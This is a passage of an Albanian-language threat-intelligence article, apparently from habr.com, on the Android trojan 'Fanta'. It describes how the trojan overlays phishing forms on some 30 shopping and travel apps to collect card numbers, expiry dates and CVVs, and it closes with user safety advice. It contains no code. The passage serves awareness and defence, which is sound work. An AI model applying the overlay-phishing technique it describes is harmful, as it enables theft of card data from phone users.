  • Fanta krijon dritare phishing me forma pĂ«r tĂ« hyrĂ« informacionin e kartelave bankare, nĂ«se Ă«shtĂ« nisur aplikacioni nga lista qĂ« pĂ«rfshin rreth 30 shĂ«rbime tĂ« ndryshme online. Mes tyre: AliExpress, Booking, Avito, Komponenti i Google Play Market, Pandao, Drom Auto dhe tĂ« tjerĂ«.

    Forma phishing

    Fanta analizon se cilat aplikacione hapen në pajisjen e infektuar. Nëse është hapur një aplikacion i interesit, trojani shfaq një dritare phishing mbi të gjitha të tjerat, e cila përbën një formë hyrje për informacionin e kartelës bankare. Përdoruesi duhet të japë të dhënat e mëposhtme:

    • Numri i kartelĂ«s
    • Data e skadimit tĂ« kartelĂ«s
    • CVV
    • Emri i mbajtĂ«sit tĂ« kartelĂ«s (jo pĂ«r tĂ« gjitha bankat)

    Sipas aplikacionit të hapur, do të shfaqen dritare phishing të ndryshme. Më poshtë do të jepen disa shembuj të tyre:

    Aliexpress:

    Shkruaj, Fanta: taktikë e re e trojanit të vjetër Android
    Avito:

    Shkruaj, Fanta: taktikë e re e trojanit të vjetër Android
    Për disa aplikacione të tjera, si p.sh. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Shkruaj, Fanta: taktikë e re e trojanit të vjetër Android

    Si ishte e vërteta

    FatmirĂ«sisht, personi qĂ« mori mesazhin SMS tĂ« pĂ«rshkruar nĂ« fillim tĂ« artikullit, ishte njĂ« specialist nĂ« fushĂ«n e sigurisĂ« kibernetike. Prandaj, versioni real, jo i filmit, ndryshon nga ai i treguar mĂ« parĂ«: personi mori njĂ« SMS tĂ« interesant, pas tĂ« cilit ia dorĂ«zoi ekipit tĂ« Group-IB Threat Hunting Intelligence. Rezultati i sulmit – ky artikull. NjĂ« fund i lumtur, apo jo? MegjithatĂ«, jo tĂ« gjitha tregimet pĂ«rfundojnĂ« aq mirĂ«, dhe qĂ« historia juaj tĂ« mos jetĂ« si versioni i filmit me humbje parash, nĂ« shumicĂ«n e rasteve mjafton tĂ« ndiqni kĂ«to rregulla tĂ« pĂ«rshkruara prej kohĂ«sh:

    • mos instaloni aplikacione pĂ«r pajisje mobile me sistemin operativ Android nga burime tĂ« ndryshme pĂ«rveç Google Play
    • kur instaloni aplikacionin, kushtojini vĂ«mendje tĂ« veçantĂ« tĂ« drejtave qĂ« aplikacioni kĂ«rkon
    • kushtojini vĂ«mendje shtesave tĂ« skedarĂ«ve qĂ« shkarkoni
    • instaloni rregullisht azhurnimet e sistemit operativ Android
    • mos vizitoni burime dyshuese dhe mos shkarkoni skedarĂ« nga aty
    • mos klikoni nĂ« lidhjet e marra nĂ« mesazhet SMS.

Burimi: habr.com

Blini hosting tĂ« besueshĂ«m pĂ«r faqe interneti me mbrojtje nga DDoS, serverĂ« VPS VDS đŸ”„ Blini hosting tĂ« besueshĂ«m pĂ«r faqe interneti me mbrojtje nga DDoS, serverĂ« VPS VDS | ProHoster